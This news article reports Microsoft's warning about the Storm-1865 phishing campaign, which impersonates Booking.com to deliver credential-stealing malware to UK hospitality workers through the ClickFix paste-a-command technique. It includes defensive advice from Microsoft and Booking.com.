A phishing campaign that impersonates popular travel platform Booking.com is targeting hospitality organisations in the UK, Microsoft has warned.
Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry.
The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. As of February 2025, this campaign is ongoing.
This phishing attack specifically targets individuals in hospitality that are most likely to work with Booking.com, sending fake emails purporting to be coming from the agency.
In the ClickFix technique, a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware. This need for user interaction could allow an attack to slip through conventional and automated security features. In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.
Microsoft tracks this campaign as Storm-1865, a cluster of activity related to phishing campaigns leading to payment data theft and fraudulent charges. Organizations can reduce the impact of phishing attacks by educating users on recognizing such scams. This blog includes additional recommendations to help users and defenders defend against these threats.
In this campaign, Storm-1865 identifies target organizations in the hospitality sector and targets individuals at those organizations likely to work with Booking.com. Storm-1865 then sends a malicious email impersonating Booking.com to the targeted individual. The content of the email varies greatly, referencing negative guest reviews, requests from prospective guests, online promotion opportunities, account verification, and more.
Sarah Armstrong-Smith, chief security adviser at Microsoft UK, said: “Phishing attacks are becoming more sophisticated, using advanced social engineering techniques like ClickFix to manipulate human behaviour and bypass traditional security measures.
“The recent campaign impersonating Booking.com is a clear example of how cybercriminals exploit trust and urgency to deceive individuals to gain access to sensitive information.
“Cybercriminals are constantly adapting their tactics, but by staying alert, questioning unexpected messages and behaviour, and enabling extra security measures, consumers can protect themselves against these evolving threats.”
Booking.com said: “Unfortunately phishing attacks by criminal organisations pose a significant threat to many industries. While we can confirm that Booking.com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware.
“The actual numbers of accommodations affected by this scam are a small fraction of those on our platform and we continue to make significant investments to limit the impact on our customers and partners.
“We are also committed to proactively helping our accommodation partners and customers to stay protected.
“Should a customer have any concern about a payment message, we ask them to carefully check the payment policy details on their booking confirmation to be sure that the message is legitimate.
“Customers are also encouraged to report any suspicious messages to our 24/7 customer service team or by clicking on ‘report an issue’ which is included in the chat function.
“It is important to note that we would never ask a customer to share payment information via email, chat messages, text messages or phone.”